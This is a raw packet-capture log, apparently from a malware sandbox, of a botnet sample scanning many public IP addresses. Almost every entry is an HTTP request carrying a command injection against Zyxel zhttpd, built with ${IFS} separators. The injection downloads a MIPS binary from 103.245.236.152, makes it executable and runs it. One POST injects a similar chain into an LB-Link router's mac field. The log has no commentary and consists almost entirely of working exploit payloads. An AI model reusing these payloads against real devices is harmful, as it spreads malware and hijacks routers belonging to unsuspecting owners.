                                      Jan 14, 2024 15:51:05.758564949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9415192.168.2.1437818175.101.1.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758603096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9416192.168.2.145722018.246.195.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758635998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9417192.168.2.1456814208.28.150.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758671999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9418192.168.2.1442538131.188.202.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758708954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9419192.168.2.1437156139.179.175.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758738041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9420192.168.2.1446182135.37.29.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758785009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9421192.168.2.1435262124.190.217.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758800983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9422192.168.2.1436764189.213.16.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758846998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9423192.168.2.1460172157.139.103.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758899927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9424192.168.2.145153014.163.211.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758954048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9425192.168.2.14332928.232.219.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758981943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9426192.168.2.1455422131.142.26.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759037018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9427192.168.2.1446120154.114.110.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759072065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9428192.168.2.1436626213.136.232.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759100914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9429192.168.2.1440452207.142.86.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759126902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9430192.168.2.145946418.137.151.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759202957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9431192.168.2.1435306157.85.49.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759212017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9432192.168.2.145917087.159.137.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759255886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9433192.168.2.145523053.35.228.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759293079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9434192.168.2.145371242.137.88.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759330034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9435192.168.2.145691839.33.144.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759382010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9436192.168.2.144433659.30.106.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759426117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9437192.168.2.144694818.143.83.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759455919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9438192.168.2.1445888153.0.161.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759510040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9439192.168.2.1452324140.171.132.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759541988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9440192.168.2.1438568132.160.18.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759601116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9441192.168.2.1452334112.32.232.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759645939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9442192.168.2.1444146124.55.158.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759675980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9443192.168.2.145892471.97.187.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759717941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9444192.168.2.1449938126.214.233.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759766102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9445192.168.2.1450822207.192.51.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759804964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9446192.168.2.1438402128.26.75.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759850979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9447192.168.2.1447158166.241.177.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759888887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9448192.168.2.145948436.204.210.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759937048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9449192.168.2.1454620216.42.145.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.759990931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9450192.168.2.1447566178.228.132.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760031939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9451192.168.2.1453006115.22.58.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760075092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9452192.168.2.1439100190.188.233.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760112047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9453192.168.2.1433832106.143.66.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760165930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9454192.168.2.143399870.14.176.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760194063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9455192.168.2.1438720162.127.101.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760231018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9456192.168.2.145594451.248.196.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760267973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9457192.168.2.145284872.47.46.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760286093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9458192.168.2.145297663.147.87.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760344028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9459192.168.2.1455646188.216.10.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760391951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9460192.168.2.144546817.197.179.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760436058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9461192.168.2.144511223.44.166.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760488033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9462192.168.2.1456264213.48.7.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760548115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9463192.168.2.1458240194.52.122.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.760596037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9464192.168.2.145814666.212.25.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.764142036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9465192.168.2.143327414.22.143.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.764168024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9466192.168.2.144187665.209.157.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.764213085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9467192.168.2.1455406193.34.158.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.764251947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9468192.168.2.1440906152.41.196.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.764307976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9469192.168.2.144620638.152.142.1628080
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.624846935 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9470192.168.2.1447556157.190.142.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764501095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9471192.168.2.1455092180.181.100.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764638901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9472192.168.2.14490464.46.246.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764669895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9473192.168.2.1438194139.19.137.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764724016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9474192.168.2.1448128200.221.42.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.764756918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9475192.168.2.1442710150.99.225.80443
                                      TimestampBytes transferredDirectionData
